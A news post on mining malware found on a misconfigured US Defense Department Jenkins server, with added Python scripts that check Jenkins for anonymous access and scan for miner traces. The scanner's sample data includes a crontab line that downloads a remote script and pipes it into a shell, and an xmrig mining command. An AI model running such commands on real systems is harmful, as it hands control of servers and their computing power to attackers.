Russian hackers? 🤔
Bug hunter Nitesh Surana discovered mining malware on a Jenkins server owned by the US Department of Defense. The researcher reported the issue through the Department of Defense's official bug bounty program on HackerOne.
Initially, the report concerned a misconfigured Jenkins server running in the AWS cloud and associated with a Department of Defense domain. Surana warned that anyone could access the server without credentials or any other check. Moreover, the access was complete: it covered the file system and even the /script endpoint (the Jenkins Script Console), where scripts handed to the server are read and executed automatically. An attacker could therefore plant a persistent backdoor or take full control of the server.
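The exposure described above is easy to check for on your own Jenkins instances. The script below is an added example, not code from the report or from the Jenkins project: it sends unauthenticated requests to a few endpoints that should never answer an anonymous caller and classifies the responses. The endpoint list, the verdict names and the `jenkins-anon-check` user agent are my own choices; the check that recognises an open Script Console by the page text is a heuristic.

```python
"""Check a Jenkins instance for anonymous access, including the /script
endpoint (Script Console), which runs Groovy with the privileges of the
Jenkins process. Added example; endpoint list and verdict names are
assumptions, not part of the original report."""
import sys
import urllib.error
import urllib.request

# Endpoints that should reject a request carrying no credentials.
PROBES = {
    "/api/json": "REST API, lists jobs and build history",
    "/computer/api/json": "build-agent inventory",
    "/script": "Script Console, executes arbitrary Groovy on the controller",
}


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface redirects instead of following them: a secured Jenkins
    sends anonymous browsers to /login, and following that would turn
    a 'denied' into a misleading 200."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


OPENER = urllib.request.build_opener(NoRedirect)


def classify(path, status, body):
    """Map one HTTP response to a verdict. 401/403 and redirects mean
    anonymous access is off; a 200 on /script whose body is the Script
    Console form means anyone can run Groovy on the controller."""
    if status in (401, 403):
        return "denied"
    if status in (301, 302, 303, 307, 308):
        return "redirected"
    if status == 200:
        if path == "/script" and ("Script Console" in body or 'name="script"' in body):
            return "open-script-console"
        return "open"
    return "unexpected-%d" % status


def probe(base_url, timeout=5.0):
    """Request every probe path without credentials; return
    {path: (verdict, status_or_reason, description)}."""
    findings = {}
    for path, what in PROBES.items():
        req = urllib.request.Request(
            base_url.rstrip("/") + path,
            headers={"User-Agent": "jenkins-anon-check"},
        )
        try:
            with OPENER.open(req, timeout=timeout) as resp:
                status = resp.status
                body = resp.read(65536).decode("utf-8", "replace")
        except urllib.error.HTTPError as err:  # 3xx (not followed), 4xx, 5xx
            status, body = err.code, ""
        except urllib.error.URLError as err:
            findings[path] = ("unreachable", str(err.reason), what)
            continue
        findings[path] = (classify(path, status, body), status, what)
    return findings


def is_exposed(findings):
    """True if any probed endpoint answered an anonymous request."""
    return any(verdict.startswith("open") for verdict, _, _ in findings.values())


if __name__ == "__main__":
    # Usage: python jenkins_anon_check.py http://jenkins.example:8080
    for path, (verdict, detail, what) in probe(sys.argv[1]).items():
        print(f"{verdict:22} {path:20} ({detail}) {what}")
```

An `open-script-console` verdict is the finding from the report: with that endpoint reachable, "a permanent backdoor" is one Groovy snippet away, so treat it as a critical exposure rather than an information leak.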
By the time Surana revisited his initial findings, Department of Defense staff had already fixed the problem. The researcher then realized that someone had discovered the vulnerability before him and that the server had already been compromised: he found evidence of mining malware specializing in the Monero cryptocurrency.
ZDNet reports that the wallet address used by the botnet has appeared in Google results dozens of times since August 2018. Most of the references are complaints from Chinese users who found miners on their cloud servers.
Using the XMRHunter service, reporters found that this wallet currently holds 35.4 Monero (approximately $2,700). However, the botnet could be using other wallets to collect the mined coins, so this figure is hardly a reliable measure of how much the malware has earned.
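The miner evidence and the reused wallet address above are the kind of indicators an operator can sweep for on a build server. The following is an added example, not code from the report: it scans process listings, crontab entries or Jenkins shell build steps for the traces a Monero miner typically leaves (known miner binary names, stratum pool URLs, xmrig-style flags, a wallet-shaped string, a download piped straight into a shell). The sample lines and the wallet string in them are constructed; the wallet is a placeholder with the right shape, not the address from the article, and the indicator list is my own.

```python
"""Sweep text lines (ps output, crontabs, Jenkins job shell steps) for
Monero-miner indicators. Added example; the indicator list and the sample
input are assumptions/constructed, not taken from the report."""
import re

# Monero base58 alphabet: digits 1-9 and letters without 0, O, I, l.
_B58 = r"[1-9A-HJ-NP-Za-km-z]"

# (pattern, reason reported when it matches)
MINER_INDICATORS = [
    (re.compile(r"\b(xmrig|minerd|cpuminer|xmr-stak)\b", re.I), "known miner binary name"),
    (re.compile(r"stratum\+(tcp|ssl)://", re.I), "stratum mining-pool URL"),
    # Standard Monero addresses are 95 base58 characters starting with 4
    # (subaddresses start with 8); the lookarounds stop partial matches
    # inside a longer base58 run.
    (re.compile(r"(?<!%s)[48]%s{94}(?!%s)" % (_B58, _B58, _B58)),
     "Monero wallet address (95-char base58 starting with 4 or 8)"),
    (re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b"), "download piped straight into a shell"),
    (re.compile(r"--donate-level|--cpu-priority|--max-cpu-usage"), "xmrig-style command-line flags"),
]


def scan(lines):
    """Return one record per line matching at least one indicator:
    {"line": 1-based index, "text": stripped line, "reasons": [...]}."""
    hits = []
    for n, line in enumerate(lines, 1):
        reasons = [why for pat, why in MINER_INDICATORS if pat.search(line)]
        if reasons:
            hits.append({"line": n, "text": line.strip(), "reasons": reasons})
    return hits


# Constructed placeholder: correct length and alphabet, not a real wallet.
PLACEHOLDER_WALLET = "4" + "AbC1" * 23 + "Ab"

# Constructed sample: two lines of a ps listing for the jenkins user, one
# crontab entry, one benign build-step command.
SAMPLE_LINES = [
    "1123 jenkins /usr/bin/java -jar /usr/share/jenkins/jenkins.war --httpPort=8080",
    "2440 jenkins /tmp/.x/xmrig -o stratum+tcp://pool.invalid:3333 -u "
    + PLACEHOLDER_WALLET + " -p x --donate-level 1",
    "*/10 * * * * curl -fsSL http://203.0.113.5/init.sh | sh",
    "2500 jenkins /usr/bin/git fetch origin",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print(f"line {hit['line']}: {', '.join(hit['reasons'])}")
        print(f"    {hit['text']}")
```

Feed it real input with something like `ps -eo pid,user,args | python miner_sweep.py` adapted to read stdin, and treat a hit on the wallet or stratum patterns as a confirmed indicator rather than a hint: a legitimate build step has no reason to carry either.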